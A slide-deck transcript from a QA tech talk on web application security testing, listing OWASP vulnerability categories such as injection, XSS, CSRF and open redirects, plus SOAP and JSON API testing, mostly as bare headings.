"web applications security testing" by kirill semenov for lohika odessa qa techtalks
TRANSCRIPT
WEB applications security testing
Semenov KirillCOST engineer
• Basic principles of security discredit• Server side vulnerability• Client side vulnerability• SOAP API and JSON API
Agenda
• Security testing essentials• WEB applications security• HTTP overview
Basic principles of security discreditPart I
Security testing essentials
Basic principles of security discredit
Particle NOT
Security testing essentials
Basic principles of security discredit
Basic principles of security discredit
WEB applications security
Network
What can be attacked?Client Server
Basic principles of security discredit
WEB applications security Organizations
Basic principles of security discredit
WEB applications security Instruments
Basic principles of security discredit
HTTP
WEB Server + Logics ServerWEB Server + Logics Server
DBMSDBMS OSOS
SQL • commands• files
BrowserBrowser(X)HTTP(S)
Basic principles of security discredit
HTTP
Basic principles of security discredit
HTTP
Server side vulnerabilityPart II
• A1 – Injection:– SQL injection– File injection– Code injection
• A2 – Broken Session Management• A4 – Insecure Direct Object Reference• A8 – Cross-Site Request Forgery (CSRF)
Server side vulnerability
A1 - InjectionWhat happens on a Server?
Server side vulnerability
A1 - InjectionMain types of Injections
Server side vulnerability
A1 - InjectionSQL Injection Types
Server side vulnerability
A1 - InjectionHow it works - UNION injection
Server side vulnerability
A1 - InjectionHow it works – Blind injection
Server side vulnerability
A1 - InjectionHow to protect?
Server side vulnerability
A1 - InjectionHow to attack?
Server side vulnerability
A1 - InjectionFile Injection
Server side vulnerability
A1 - InjectionCode & Command Injection
Server side vulnerability
A2 – Authentication and Session Management
Server side vulnerability
A4 – Insecure Direct Object Reference
Client side vulnerability
A8 – Cross Site Request Forgery
XSS
Trap
Victim
CSRF
Site1
Site2
Trap
Victim
Client side vulnerability
A8 – Cross Site Request Forgery
Client side vulnerabilityPart III
• A3 – Cross-Site Scripting (XSS)o storedo reflected
• A10 – Unvalidated Redirects
Client side vulnerability
What happens on Client (Browser)?
XSS
Client side vulnerability
A3 - XSS
XSS - execute malicious Java Script code inside authorized user session, who has higher privileges than attacker
Client side vulnerability
A3 - XSS
WEB Server + Logics Server
WEB Server + Logics Server
DBMSDBMS OSOS
SQL • commands• files
(X)HTTP(S)BrowserBrowser
WEB Server + Logics ServerWEB Server + Logics Server
DBMSDBMS OSOS
SQL • commands• files
BrowserBrowser
(X)HTTP(S)
User data
Stored Reflected
Client side vulnerability
A3 - XSS
A3 - XSSHow to attack?
Client side vulnerability
A3 - XSSHow to protect?
Client side vulnerability
Client side vulnerability
A3 - XSSQ&A
Client side vulnerability
A10 – Unvalidated redirectshttp://gmail.com/redirect.jsp?url=http://gmeil.com
Same interface
TrapVictim
Valid host Invalid host
SOAP API & JSON APIPart IV
SOAP API & JSON API
Architecture
SOAP API & JSON API
SOAP UI• SoapUI is a free and open source cross-platform Functional Testing solution• http://www.soapui.org/about-soapui/what-is-soapui-.html
SOAP API & JSON API
Q&A
Thank You!